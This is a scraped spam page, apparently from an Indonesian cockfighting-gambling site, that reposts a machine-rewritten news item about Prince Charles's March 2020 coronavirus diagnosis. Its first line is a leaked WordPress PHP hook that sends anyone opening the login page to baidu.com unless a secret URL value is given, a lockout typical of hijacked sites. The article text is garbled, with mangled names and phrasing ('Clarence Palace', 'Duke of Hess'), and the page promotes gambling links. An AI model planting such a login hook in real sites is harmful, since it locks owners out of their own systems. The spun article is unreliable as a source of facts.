//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Data dan file biologis Pangeran Charles, pewaris takhta Inggris yang terinfeksi virus Corona | adu ayam bali_s128.net login_s128.live

Data dan file biologis Pangeran Charles, pewaris takhta Inggris yang terinfeksi virus Corona

TRIBUNNEWS.COM-Pangeran Charles, pewaris takhta Inggris, secara aktif terinfeksi virus Corona.

Menurut laporan, ada pandemi virus Corona di Inggris dan total 8.077 orang telah terinfeksi oleh virus. Nama resminya adalah SARS-Cov-2, dimana 422 orang meninggal.

– Menurut laporan, putra tertua Ratu Elizabeth II dan pewaris takhta Inggris, Pangeran Charles, secara positif terpengaruh oleh insiden ini. Virus Corona .

CNN melaporkan pada hari Rabu (25/3/2020) bahwa Putra Mahkota, yang saat ini memegang gelar Prince of Wales, saat ini sedang dikarantina di Skotlandia.

Di pangkalan Clarence Palace, Pangeran Charles positif terinfeksi virus korona setelah menunjukkan gejala ringan.

“Saat ini, dia dalam kesehatan yang baik dan telah bekerja di rumah selama beberapa hari seperti biasa,” kata istana.

Istri Charles, Camilla, yang bergelar Duchess of Cornwall, juga mengikuti tes Covid-19 dan hasilnya negatif.

“Menurut rekomendasi pemerintah dan tim medis, pangeran dan Duke of Cornwall, Duke of Hess, berada di bawah karantina sendiri di Skotlandia.”

Demikian pernyataan istana.

Clarence House menjelaskan itu saat ini Tidak jelas bagaimana ayah Pangeran Harry dan Pangeran William tertular virus corona.

Leave a comment

adu ayam bali_s128.net login_s128.live